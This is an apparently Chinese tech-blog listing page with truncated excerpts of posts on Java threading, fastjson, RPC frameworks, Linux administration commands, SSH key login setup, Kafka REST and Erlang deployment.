    一.进程和线程 进程就是一个在内存中独立运行的程序,有自己的地址空间。如正在运行的写字板程序就是一个进程。 “多任务”:指操作系统能同时运行多个进程(程序)。如WINDOWS系统可以同时运行写字板程序、画图程序、WORD、Eclipse等。 线程:是进程内部单一的一个顺序控制流。 线程和进程 a.       每个进程都有独立的
  • fastjson简单使用实例 bijian1013 fastjson
    一.简介         阿里巴巴fastjson是一个Java语言编写的高性能功能完善的JSON库。它采用一种“假定有序快速匹配”的算法,把JSON Parse的性能提升到极致,是目前Java语言中最快的JSON库;包括“序列化”和“反序列化”两部分,它具备如下特征:     
  • 【RPC框架Burlap】Spring集成Burlap bit1129 spring
    Burlap和Hessian同属于codehaus的RPC调用框架,但是Burlap已经几年不更新,所以Spring在4.0里已经将Burlap的支持置为Deprecated,所以在选择RPC框架时,不应该考虑Burlap了。 这篇文章还是记录下Burlap的用法吧,主要是复制粘贴了Hessian与Spring集成一文,【RPC框架Hessian四】Hessian与Spring集成  
  • 【Mahout一】基于Mahout 命令参数含义 bit1129 Mahout
    1. mahout seqdirectory   $ mahout seqdirectory --input (-i) input Path to job input directory(原始文本文件). --output (-o) output The directory pathna
  • linux使用flock文件锁解决脚本重复执行问题 ronin47 linux lock 重复执行
    linux的crontab命令,可以定时执行操作,最小周期是每分钟执行一次。关于crontab实现每秒执行可参考我之前的文章《linux crontab 实现每秒执行》现在有个问题,如果设定了任务每分钟执行一次,但有可能一分钟内任务并没有执行完成,这时系统会再执行任务。导致两个相同的任务在执行。 例如: <? //  test .php
  • java-74-数组中有一个数字出现的次数超过了数组长度的一半,找出这个数字 bylijinnan java
    public class OcuppyMoreThanHalf { /** * Q74 数组中有一个数字出现的次数超过了数组长度的一半,找出这个数字 * two solutions: * 1.O(n) * see <beauty of coding>--每次删除两个不同的数字,不改变数组的特性 * 2.O(nlogn) * 排序。中间
  • linux 系统相关命令 candiio linux
    系统参数 cat /proc/cpuinfo  cpu相关参数 cat /proc/meminfo 内存相关参数 cat /proc/loadavg 负载情况 性能参数 1)top M:按内存使用排序 P:按CPU占用排序 1:显示各CPU的使用情况 k:kill进程 o:更多排序规则 回车:刷新数据 2)ulimit ulimit -a:显示本用户的系统限制参
  • [经营与资产]保持独立性和稳定性对于软件开发的重要意义 comsci 软件开发
         一个软件的架构从诞生到成熟,中间要经过很多次的修正和改造       如果在这个过程中,外界的其它行业的资本不断的介入这种软件架构的升级过程中           那么软件开发者原有的设计思想和开发路线
  • 在CentOS5.5上编译OpenJDK6 Cwind linuxOpenJDK
    几番周折终于在自己的CentOS5.5上编译成功了OpenJDK6,将编译过程和遇到的问题作一简要记录,备查。 0. OpenJDK介绍 OpenJDK是Sun(现Oracle)公司发布的基于GPL许可的Java平台的实现。其优点: 1、它的核心代码与同时期Sun(-> Oracle)的产品版基本上是一样的,血统纯正,不用担心性能问题,也基本上没什么兼容性问题;(代码上最主要的差异是
  • java乱码问题 dashuaifu java乱码问题js中文乱码
    swfupload上传文件参数值为中文传递到后台接收中文乱码     在js中用setPostParams({"tag" : encodeURI( document.getElementByIdx_x("filetag").value,"utf-8")}); 然后在servlet中String t
  • cygwin很多命令显示command not found的解决办法 dcj3sjt126com cygwin
    cygwin很多命令显示command not found的解决办法   修改cygwin.BAT文件如下 @echo off D: set CYGWIN=tty notitle glob set PATH=%PATH%;d:\cygwin\bin;d:\cygwin\sbin;d:\cygwin\usr\bin;d:\cygwin\usr\sbin;d:\cygwin\us
  • [介绍]从 Yii 1.1 升级 dcj3sjt126com PHPyii2
    2.0 版框架是完全重写的,在 1.1 和 2.0 两个版本之间存在相当多差异。因此从 1.1 版升级并不像小版本间的跨越那么简单,通过本指南你将会了解两个版本间主要的不同之处。 如果你之前没有用过 Yii 1.1,可以跳过本章,直接从"入门篇"开始读起。 请注意,Yii 2.0 引入了很多本章并没有涉及到的新功能。强烈建议你通读整部权威指南来了解所有新特性。这样有可能会发
  • Linux SSH免登录配置总结 eksliang ssh-keygenLinux SSH免登录认证Linux SSH互信
    转载请出自出处:http://eksliang.iteye.com/blog/2187265 一、原理      我们使用ssh-keygen在ServerA上生成私钥跟公钥,将生成的公钥拷贝到远程机器ServerB上后,就可以使用ssh命令无需密码登录到另外一台机器ServerB上。      生成公钥与私钥有两种加密方式,第一种是
  • 手势滑动销毁Activity gundumw100 android
    老是效仿ios,做android的真悲催! 有需求:需要手势滑动销毁一个Activity 怎么办尼?自己写? 不用~,网上先问一下百度。 结果: http://blog.csdn.net/xiaanming/article/details/20934541 首先将你需要的Activity继承SwipeBackActivity,它会在你的布局根目录新增一层SwipeBackLay
  • JavaScript变换表格边框颜色 ini JavaScripthtmlWebhtml5css
    效果查看:http://hovertree.com/texiao/js/2.htm代码如下,保存到HTML文件也可以查看效果: <html> <head> <meta charset="utf-8"> <title>表格边框变换颜色代码-何问起</title> </head> <body&
  • Kafka Rest : Confluent kane_xie kafkaRESTconfluent
    最近拿到一个kafka rest的需求,但kafka暂时还没有提供rest api(应该是有在开发中,毕竟rest这么火),上网搜了一下,找到一个Confluent Platform,本文简单介绍一下安装。 这里插一句,给大家推荐一个九尾搜索,原名叫谷粉SOSO,不想fanqiang谷歌的可以用这个。以前在外企用谷歌用习惯了,出来之后用度娘搜技术问题,那匹配度简直感人。 环境声明:Ubu
  • Calender不是单例 men4661273 单例Calender
             在我们使用Calender的时候,使用过Calendar.getInstance()来获取一个日期类的对象,这种方式跟单例的获取方式一样,那么它到底是不是单例呢,如果是单例的话,一个对象修改内容之后,另外一个线程中的数据不久乱套了吗?从试验以及源码中可以得出,Calendar不是单例。 测试: Calendar c1 =
  • 线程内存和主内存之间联系 qifeifei java thread
    1, java多线程共享主内存中变量的时候,一共会经过几个阶段,    lock:将主内存中的变量锁定,为一个线程所独占。   unclock:将lock加的锁定解除,此时其它的线程可以有机会访问此变量。   read:将主内存中的变量值读到工作内存当中。   load:将read读取的值保存到工作内存中的变量副本中。  
  • schedule和scheduleAtFixedRate tangqi609567707 javatimerschedule
    原文地址:http://blog.csdn.net/weidan1121/article/details/527307 import java.util.Timer;import java.util.TimerTask;import java.util.Date; /** * @author vincent */public class TimerTest {  
  • erlang 部署 wudixiaotie erlang
    1.如果在启动节点的时候报这个错 : {"init terminating in do_boot",{'cannot load',elf_format,get_files}} 则需要在reltool.config中加入 {app, hipe, [{incl_cond, exclude}]},     2.当generate时,遇到: ERROR
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他